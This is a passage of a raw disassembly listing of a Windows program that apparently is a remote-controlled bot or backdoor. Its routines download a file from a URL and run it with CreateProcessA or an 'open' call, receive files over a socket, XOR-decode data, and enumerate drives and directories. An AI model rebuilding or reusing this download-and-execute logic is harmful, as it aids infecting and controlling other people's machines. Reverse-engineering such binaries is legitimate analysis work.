push offset unk_44E78C
jmp short loc_416BFD
; ---------------------------------------------------------------------------
loc_416BB7: ; CODE XREF: sub_416B2D+81�j
push eax
call ds:off_4F533C
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_41E490
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_416BDF
push offset unk_44E7C0
jmp short loc_416BFD
; ---------------------------------------------------------------------------
loc_416BDF: ; CODE XREF: sub_416B2D+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_416541
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_416C10
push offset unk_44E7EC
loc_416BFD: ; CODE XREF: sub_416B2D+88�j
; sub_416B2D+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_41EA60
pop ecx
pop ecx
jmp loc_416D0A
; ---------------------------------------------------------------------------
loc_416C10: ; CODE XREF: sub_416B2D+C9�j
mov esi, 1000h
loc_416C15: ; CODE XREF: sub_416B2D+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_4E2FE0 ; recv
mov edi, eax
cmp edi, ebx
jz loc_416CDC
cmp edi, 0FFFFFFFFh
jz short loc_416C7D
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_4211C0
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call ds:dword_4E2FC4 ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
jmp short loc_416C15
; ---------------------------------------------------------------------------
loc_416C7D: ; CODE XREF: sub_416B2D+118�j
lea eax, [ebp+var_4C4]
push offset dword_44E80C
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_409C75
lea eax, [ebp+var_4C4]
push eax
call sub_415A3C
push [ebp+var_4]
call sub_41BCF0
add esp, 24h
push [ebp+arg_0]
call ds:dword_4E3060 ; closesocket
push [ebp+var_1C]
call sub_40B9A7
pop ecx
push 1
call ds:dword_4F53A0 ; ExitThread
loc_416CDC: ; CODE XREF: sub_416B2D+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_41727E
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_4C4]
push offset unk_44E824
push eax
call sub_41EA60
add esp, 1Ch
loc_416D0A: ; CODE XREF: sub_416B2D+DE�j
cmp [ebp+var_14], ebx
jnz short loc_416D2F
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_409C75
add esp, 14h
loc_416D2F: ; CODE XREF: sub_416B2D+1E0�j
lea eax, [ebp+var_4C4]
push eax
call sub_415A3C
cmp [ebp+var_4], ebx
pop ecx
jz short loc_416D4A
push [ebp+var_4]
call sub_41BCF0
pop ecx
loc_416D4A: ; CODE XREF: sub_416B2D+212�j
cmp [ebp+arg_0], ebx
jbe short loc_416D58
push [ebp+arg_0]
call ds:dword_4E3060 ; closesocket
loc_416D58: ; CODE XREF: sub_416B2D+220�j
push [ebp+var_1C]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_416B2D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D68 proc near ; DATA XREF: sub_401C87+6327�o
; sub_401C87+6B4F�o
var_570 = qword ptr -570h
var_564 = qword ptr -564h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
rep movsd
xor edi, edi
xor esi, esi
inc edi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push ds:dword_4E2F78
call ds:dword_4E2ECC ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_4171E1
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
call ds:off_4F53C0
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_416E2F
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset unk_44E850
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_416E12
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409C75
add esp, 14h
loc_416E12: ; CODE XREF: sub_416D68+88�j
lea eax, [ebp+var_510]
push eax
call sub_415A3C
push [ebp+var_48]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_416E2F: ; CODE XREF: sub_416D68+68�j
xor edi, edi
call ds:dword_4F537C ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_41BE40
pop ecx
mov [ebp+var_1C], eax
loc_416E49: ; CODE XREF: sub_416D68+1A9�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call ds:dword_4E2ED4 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_416E8D
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_417247
pop ecx
pop ecx
loc_416E8D: ; CODE XREF: sub_416D68+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_4F53B4 ; WriteFile
cmp edi, ebx
jnb short loc_416ECB
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_416EB5
mov eax, [ebp+arg_0]
loc_416EB5: ; CODE XREF: sub_416D68+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_41FBF0
add esp, 0Ch
loc_416ECB: ; CODE XREF: sub_416D68+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_416ED8
cmp edi, [ebp+var_3C]
ja short loc_416F17
loc_416ED8: ; CODE XREF: sub_416D68+169�j
mov eax, edi
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_455D00
cmp [ebp+var_44], 1
jz short loc_416F00
push offset unk_44E878
jmp short loc_416F05
; ---------------------------------------------------------------------------
loc_416F00: ; CODE XREF: sub_416D68+18F�j
push offset unk_44E8A0
loc_416F05: ; CODE XREF: sub_416D68+196�j
push eax
call sub_41EA60
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_416E49
loc_416F17: ; CODE XREF: sub_416D68+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_416F6C
cmp edi, [ebp+var_3C]
jz short loc_416F6C
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset unk_44E8C8
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409C75
lea eax, [ebp+var_510]
push eax
call sub_415A3C
add esp, 28h
loc_416F6C: ; CODE XREF: sub_416D68+1B9�j
; sub_416D68+1BE�j
call ds:dword_4F537C ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:off_4F533C
push [ebp+var_1C]
call sub_41C9D0
cmp [ebp+var_38], esi
pop ecx
jz short loc_416FF6
lea eax, [ebp+var_148]
push eax
call sub_4010AA
cmp eax, [ebp+var_38]
pop ecx
jz short loc_416FF6
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset unk_44E8F4
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409C75
lea eax, [ebp+var_510]
push eax
call sub_415A3C
add esp, 28h
loc_416FF6: ; CODE XREF: sub_416D68+236�j
; sub_416D68+248�j
cmp [ebp+var_14], esi
jz loc_41722E
cmp [ebp+var_44], 1
push ecx
lea eax, [ebp+var_148]
push ecx
jz loc_4170F1
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_43C490
fstp [esp+564h+var_564]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_43C490
fstp [esp+570h+var_570]
push offset unk_44E91C
push eax
call sub_41EA60
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_417071
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409C75
add esp, 14h
loc_417071: ; CODE XREF: sub_416D68+2E7�j
lea eax, [ebp+var_510]
push eax
call sub_415A3C
cmp [ebp+var_40], 1
pop ecx
jnz loc_41722E
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen_2 ; "open"
push esi
call ds:dword_4E2F34
cmp [ebp+var_30], esi
jnz loc_41722E
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset dword_44E95C
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409C75
lea eax, [ebp+var_510]
push eax
call sub_415A3C
add esp, 24h
jmp loc_41722E
; ---------------------------------------------------------------------------
loc_4170F1: ; CODE XREF: sub_416D68+2A3�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_43C490
fstp [esp+564h+var_564]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_43C490
fstp [esp+570h+var_570]
push offset unk_44E978
push eax
call sub_41EA60
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_417151
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409C75
add esp, 14h
loc_417151: ; CODE XREF: sub_416D68+3C7�j
lea eax, [ebp+var_510]
push eax
call sub_415A3C
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41E4B0
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_41E4B0
add esp, 1Ch
lea eax, [ebp+var_10]
mov [ebp+var_310], edi
xor edi, edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
inc edi
push eax
push esi
mov [ebp+var_304], offset dword_4EABF8
mov [ebp+var_2E4], edi
mov [ebp+var_2E0], si
call ds:dword_4F5340 ; CreateProcessA
cmp eax, edi
jnz short loc_4171D3
call ds:dword_4E2F20 ; WSACleanup
call sub_418EAE
push esi
call ds:off_4F5338
loc_4171D3: ; CODE XREF: sub_416D68+457�j
lea eax, [ebp+var_148]
push eax
push offset unk_44E9BC
jmp short loc_4171ED
; ---------------------------------------------------------------------------
loc_4171E1: ; CODE XREF: sub_416D68+45�j
lea eax, [ebp+var_248]
push eax
push offset unk_44E9F0
loc_4171ED: ; CODE XREF: sub_416D68+477�j
lea eax, [ebp+var_510]
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_417221
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409C75
add esp, 14h
loc_417221: ; CODE XREF: sub_416D68+497�j
lea eax, [ebp+var_510]
push eax
call sub_415A3C
pop ecx
loc_41722E: ; CODE XREF: sub_416D68+291�j
; sub_416D68+31A�j ...
push [ebp+var_18]
call ds:dword_4E2FFC ; InternetCloseHandle
push [ebp+var_48]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
sub_416D68 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417247 proc near ; CODE XREF: sub_416D68+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_417263
loc_417253: ; CODE XREF: sub_417247+1A�j
mov dl, ds:byte_43F098
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_417253
locret_417263: ; CODE XREF: sub_417247+A�j
retn
sub_417247 endp
; =============== S U B R O U T I N E =======================================
sub_417264 proc near ; CODE XREF: sub_401C87+58C2�p
; sub_401C87+5A31�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_421420
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_417264 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41727E proc near ; CODE XREF: sub_410287+462�p
; sub_410287+5FE�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_4EABFC
push 0
push edi
call sub_41E4B0
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_4172A3: ; CODE XREF: sub_41727E+5B�j
; sub_41727E+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_4214F0
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_421480
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_4172E1
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_4172A3
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_4172A3
; ---------------------------------------------------------------------------
loc_4172E1: ; CODE XREF: sub_41727E+4B�j
mov eax, edi
jmp short loc_4172EA
; ---------------------------------------------------------------------------
loc_4172E5: ; CODE XREF: sub_41727E+72�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_4172EA: ; CODE XREF: sub_41727E+65�j
dec esi
lea ecx, [ebp+var_38]
cmp esi, ecx
jnb short loc_4172E5
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_41727E endp
; =============== S U B R O U T I N E =======================================
sub_4172FC proc near ; CODE XREF: sub_4174B1+51�p
; sub_4174B1+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4E3028 ; GetDriveTypeA
sub eax, 0
jz short loc_41733F
dec eax
jz short loc_417339
dec eax
dec eax
jz short loc_417333
dec eax
jz short loc_41732D
dec eax
jz short loc_417327
dec eax
jz short loc_417321
mov eax, offset a?_0 ; "?"
retn
; ---------------------------------------------------------------------------
loc_417321: ; CODE XREF: sub_4172FC+1D�j
mov eax, offset off_44EA20
retn
; ---------------------------------------------------------------------------
loc_417327: ; CODE XREF: sub_4172FC+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_41732D: ; CODE XREF: sub_4172FC+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_417333: ; CODE XREF: sub_4172FC+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_417339: ; CODE XREF: sub_4172FC+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_41733F: ; CODE XREF: sub_4172FC+D�j
mov eax, offset aUnknown_1 ; "Unknown"
retn
sub_4172FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417345 proc near ; CODE XREF: sub_41738D+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, ds:dword_4E2EB8
test eax, eax
jz short loc_41737A
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_41737A: ; CODE XREF: sub_417345+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_417345 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41738D proc near ; CODE XREF: sub_4174B1+17�p
; sub_41B6C1+1F3�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_417345
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_417467
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_417467
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_417467
mov edi, 400h
push 0
push edi
push [ebp+var_14]
push [ebp+var_18]
call sub_421570
push edx
push eax
call sub_41727E
push eax
mov esi, 80h
push offset aSkb ; "%sKB"
lea eax, [ebp+var_198]
push esi
push eax
call sub_41EC30
add esp, 18h
push 0
push edi
push [ebp+var_C]
push [ebp+var_10]
call sub_421570
push edx
push eax
call sub_41727E
push eax
push offset aSkb_0 ; "%sKB"
lea eax, [ebp+var_118]
push esi
push eax
call sub_41EC30
add esp, 18h
push 0
push edi
push [ebp+var_4]
push [ebp+var_8]
call sub_421570
push edx
push eax
call sub_41727E
push eax
push offset aSkb_1 ; "%sKB"
lea eax, [ebp+var_98]
push esi
push eax
call sub_41EC30
jmp short loc_41749A
; ---------------------------------------------------------------------------
loc_417467: ; CODE XREF: sub_41738D+2C�j
; sub_41738D+3B�j ...
lea eax, [ebp+var_198]
push offset aFailed ; "failed"
push eax
call sub_41EA60
lea eax, [ebp+var_118]
push offset aFailed_0 ; "failed"
push eax
call sub_41EA60
lea eax, [ebp+var_98]
push offset aFailed_1 ; "failed"
push eax
call sub_41EA60
loc_41749A: ; CODE XREF: sub_41738D+D8�j
mov eax, [ebp+arg_0]
add esp, 18h
lea esi, [ebp+var_198]
mov edi, eax
push 60h
pop ecx
rep movsd
pop edi
pop esi
leave
retn
sub_41738D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4174B1 proc near ; CODE XREF: sub_417583+17�p
; sub_417583+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_41738D
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed_2 ; "failed"
rep movsd
push eax
call sub_41F7E0
add esp, 10h
test eax, eax
jnz short loc_417524
push ebx
push ebx
call sub_4172FC
pop ecx
push eax
push offset unk_44EA84
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41EC30
add esp, 14h
jmp short loc_417558
; ---------------------------------------------------------------------------
loc_417524: ; CODE XREF: sub_4174B1+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_4172FC
pop ecx
push eax
push offset unk_44EAC0
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41EC30
add esp, 20h
loc_417558: ; CODE XREF: sub_4174B1+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_500]
push eax
call sub_415A3C
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_4174B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417583 proc near ; CODE XREF: sub_401C87+250D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_4175A4
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4174B1
add esp, 10h
jmp short loc_417603
; ---------------------------------------------------------------------------
loc_4175A4: ; CODE XREF: sub_417583+9�j
push esi
push edi
push ebx
push ebx
call ds:dword_4E2F30 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_41BE40
pop ecx
mov edi, eax
push edi
push esi
call ds:dword_4E2F30 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_4175FA
loc_4175C8: ; CODE XREF: sub_417583+75�j
push offset aA_2 ; "A:\\"
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_4175EB
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4174B1
add esp, 10h
loc_4175EB: ; CODE XREF: sub_417583+54�j
push esi
call sub_41BC70
lea esi, [esi+eax+1]
pop ecx
cmp [esi], bl
jnz short loc_4175C8
loc_4175FA: ; CODE XREF: sub_417583+43�j
push edi
call sub_41C9D0
pop ecx
pop edi
pop esi
loc_417603: ; CODE XREF: sub_417583+1F�j
pop ebx
pop ebp
retn
sub_417583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417606 proc near ; DATA XREF: sub_401C87+6935�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_41BC70
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_41765B
lea eax, [ebp+var_114]
push eax
call sub_41BC70
pop ecx
mov [ebp+eax+var_115], bl
loc_41765B: ; CODE XREF: sub_417606+3F�j
lea eax, [ebp+var_218]
push eax
push offset unk_44EB00
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41EC30
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_4176A0
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_409C75
add esp, 14h
loc_4176A0: ; CODE XREF: sub_417606+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_41771E
push eax
lea eax, [ebp+var_49C]
push offset dword_44EB28
push eax
call sub_41EA60
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_4176FE
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_409C75
add esp, 14h
loc_4176FE: ; CODE XREF: sub_417606+D6�j
lea eax, [ebp+var_49C]
push eax
call sub_415A3C
push [ebp+var_10]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_417606 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41771E proc near ; CODE XREF: sub_417606+B9�p
; sub_41771E+9C�p
var_548 = byte ptr -548h
var_348 = byte ptr -348h
var_244 = byte ptr -244h
var_140 = byte ptr -140h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 548h
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_244]
push offset dword_44EB48
push esi
push eax
call sub_41EC30
mov edi, ds:off_4F53F0
add esp, 10h
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_244]
push eax
call edi ; sub_50A334
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4177D7
loc_417764: ; CODE XREF: sub_41771E+B7�j
test [ebp+var_140], 10h
jz short loc_4177C5
cmp [ebp+var_114], 2Eh
jnz short loc_417788
cmp [ebp+var_113], 0
jz short loc_4177C5
cmp [ebp+var_113], 2Eh
jz short loc_4177C5
loc_417788: ; CODE XREF: sub_41771E+56�j
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_348]
push [ebp+arg_10]
push offset dword_44EB50
push esi
push eax
call sub_41EC30
push [ebp+arg_14]
lea eax, [ebp+var_348]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41771E
add esp, 2Ch
mov [ebp+arg_14], eax
loc_4177C5: ; CODE XREF: sub_41771E+4D�j
; sub_41771E+5F�j ...
lea eax, [ebp+var_140]
push eax
push ebx
call ds:off_4F53EC
test eax, eax
jnz short loc_417764
loc_4177D7: ; CODE XREF: sub_41771E+44�j
push ebx
mov ebx, ds:off_4F53E0
call ebx ; sub_50A5FF
push [ebp+arg_C]
lea eax, [ebp+var_244]
push [ebp+arg_10]
push offset dword_44EB58
push esi
push eax
call sub_41EC30
add esp, 14h
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_244]
push eax
call edi ; sub_50A334
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_417861
loc_417812: ; CODE XREF: sub_41771E+141�j
lea eax, [ebp+var_114]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_548]
push [ebp+arg_10]
push offset dword_44EB60
push 200h
push eax
call sub_41EC30
push 1
lea eax, [ebp+var_548]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 28h
lea eax, [ebp+var_140]
push eax
push esi
call ds:off_4F53EC
test eax, eax
jnz short loc_417812
loc_417861: ; CODE XREF: sub_41771E+F2�j
push esi
call ebx ; sub_50A5FF
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_41771E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41786C proc near ; DATA XREF: sub_401C87+1C7D�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
rep movsd
xor esi, esi
inc esi
mov [eax+90h], esi
call sub_41B56E
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_4178AB
cmp eax, 2
